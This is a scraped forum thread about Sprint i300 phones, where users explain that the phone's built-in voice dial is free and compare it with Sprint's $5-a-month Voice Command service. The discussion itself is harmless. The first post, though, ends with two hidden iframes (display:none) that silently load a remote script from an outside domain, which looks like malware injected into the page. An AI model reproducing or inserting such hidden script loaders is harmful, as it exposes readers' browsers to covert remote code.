+ Reply to Thread

Do I have to pay for Voice dial?

Always trying to save a buck...
    When I first got the i300 and before I had any Sprint service, I setup a contact, recorded a voice dial, and the voice dial would actually dial the number. Of course, all I got was a recording that the phone was not active. So do I have to have Sprint's voice dial option ($5 per month) or not?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

your post was a litle confusing (atleast to me)..

voice dial on the i300 is a feature of the phone, so its free. voice command a la sprint pcs is 5 bucks/month, but its a free feature on certain sprnt plans...

...aint we all brother!

Further, should your plan not include free voice command, the first 3 months of service at $5/month will be on the house. Aren't they good to us!

The i300 allows a max of 20 voice dials, free of charge. If you need more, you'll need to pay Sprint (or change the need..!...).

RJS

Re: Do I have to pay for Voice dial?

Originally posted by Tennis Shoe
    When I first got the i300 and before I had any Sprint service, I setup a contact, recorded a voice dial, and the voice dial would actually dial the number. Of course, all I got was a recording that the phone was not active. So do I have to have Sprint's voice dial option ($5 per month) or not?
    You are not charged when using the voice dial feature on the I300 phone itself.

SPCS Voice Command is a bit more sophisticated and doesn't seem to get confused as much. Very rarely does Voice Command ask you to repeat the name. I suppose if you were a real mush-mouth or had a foreign dialect, it may have more difficulty. Voice command does not rely on the sound of your voice to seek the entries from the address book the way the i300 voice dial feature does. Rather, Voice Command converts the text in your address book entries to speech and then seeks the entry accordingly. The Voice Command address book maintained at www.sprintpcs.com has nothing to do with your i300 entries in the PDA itself, while the voice dial feature on the phone relies solely on your voice dial entries stored on the phone.

The I300 Voice Dial feature is OK, but what if your data gets wiped out by a hard reset caused by one of those nasty apps that don't sit well with the PDA? In such a case, you would lose all your data. Even a hotsync will not restore your voice dials or speed dials (I learned this the hard way.) Of course the upside is that it's free.

I think the SPCS Voice Command option is well worth it. You can enter up to 500 names in your SPCS address book by using the SPCS webiste (when it works.) If your data ever gets wiped out of your pda, you'll still have access to all your voice dials.

So........

Internal Voice dial feature
    -free
    -entries stored on your phone itself
    -volatile (succeptable to crashes and data loss)
    -somewhat picky when it comes to voice recognition, but not bad

SPCS Voice Command
    - $5/mo. for most customers
    - much more stable (can be used even after a crash)
    - maintained in an address book outside your phone
    - better speech recognition
    - allows multiple numbers for an entry (call John Smith at work, call John Smith at home, call John Smith on the mobile phone.)
    - Nice backup in case you lose your data.

I hope I don't sound biased toward the Voice Command

Administrator

Arrow

you didnt.. i use it exclusively.. i only have one entry in my voice dial on the i300 labeled "voice command" (thanks ERIC) and from there i conect to the sprints VC... plus you can sync your palm or outlook contacts with the sprint vc... very cool...

...thanks for leaving out the bootleg wisp ear buddy! I know it was hard though!

Administrator

Arrow

Originally posted by mjorange
    ...thanks for leaving out the bootleg wisp ear buddy! I know it was hard though!
    ahhh MJ knows me well.. yes it was hard.. but as you see, i have you "mentioning" it for me!!

so, in essence, it was mentioned anyway.... :p